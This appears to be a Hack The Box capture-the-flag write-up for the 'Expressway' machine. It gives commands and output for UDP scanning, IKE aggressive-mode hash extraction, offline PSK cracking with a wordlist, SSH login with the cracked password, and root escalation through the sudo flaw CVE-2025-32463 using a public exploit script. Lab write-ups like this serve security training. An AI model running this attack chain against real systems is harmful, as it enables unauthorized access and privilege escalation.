🛣️Expressway

https://app.hackthebox.com/machines/Expressway

🔎 Enumeration

TCP Scan

sudo nmap -A <machine-ip>

Result:

Nmap scan report for Machine_IP
Host is up (0.016s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)

Only SSH was exposed on TCP.

UDP Scan

sudo nmap -sU --top-ports 100 <machine-ip>

Result:

PORT     STATE         SERVICE
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
500/udp  open          isakmp
4500/udp open|filtered nat-t-ike

The presence of ISAKMP (UDP 500) and NAT-T (UDP 4500) suggests a VPN / IKE service.

🔐 IKE Enumeration

Aggressive Mode Detection

sudo ike-scan -A expressway.htb

Result:

Machine_IP  Aggressive Mode Handshake returned
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)

Aggressive Mode is enabled, allowing offline PSK cracking.

Extract IKE Hash

sudo ike-scan -A expressway.htb --id=ike@expressway.htb -P hash

This produces an IKE PSK hash suitable for cracking.

🔓 PSK Cracking

psk-crack -d /usr/share/rockyou.txt hash.txt

Result:

key "freakingrockstarontheroad" matches SHA1 hash

Valid VPN/SSH credentials were recovered.

🚪 Initial Access

ssh ike@expressway.htb

The authenticity of host 'expressway.htb (Machine_IP)' can't be established.

Successful login using the cracked password.

📌 User Access

cat user.txt

User flag obtained.

🔎 Privilege Escalation Enumeration

sudo -V

Sudo version 1.9.17

This version is vulnerable to CVE-2025-32463.

🚀 Privilege Escalation (CVE-2025-32463)

Exploit Setup

git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
cd CVE-2025-32463_chwoot
scp sudo-chwoot.sh ike@expressway.htb:/tmp/

Exploitation

cd /tmp
chmod +x sudo-chwoot.sh
./sudo-chwoot.sh

Result:

woot!
uid=0(root) gid=0(root)

Root shell obtained.

🏁 Root Flag

cat /root/root.txt

✅ Summary

UDP scan revealed ISAKMP
IKE Aggressive Mode enabled
PSK cracked via ike-scan + psk-crack
SSH access as ike
Local privilege escalation via CVE-2025-32463
Root access achieved

Last updated 2 months ago

hashtag🔎 Enumeration

hashtagTCP Scan

hashtagUDP Scan

hashtag🔐 IKE Enumeration

hashtagAggressive Mode Detection

hashtagExtract IKE Hash

hashtag🔓 PSK Cracking

hashtag🚪 Initial Access

hashtag📌 User Access

hashtag🔎 Privilege Escalation Enumeration

hashtag🚀 Privilege Escalation (CVE-2025-32463)

hashtagExploit Setup

hashtagExploitation

hashtag🏁 Root Flag

hashtag✅ Summary

🔎 Enumeration

TCP Scan

UDP Scan

🔐 IKE Enumeration

Aggressive Mode Detection

Extract IKE Hash

🔓 PSK Cracking

🚪 Initial Access

📌 User Access

🔎 Privilege Escalation Enumeration

🚀 Privilege Escalation (CVE-2025-32463)

Exploit Setup

Exploitation

🏁 Root Flag

✅ Summary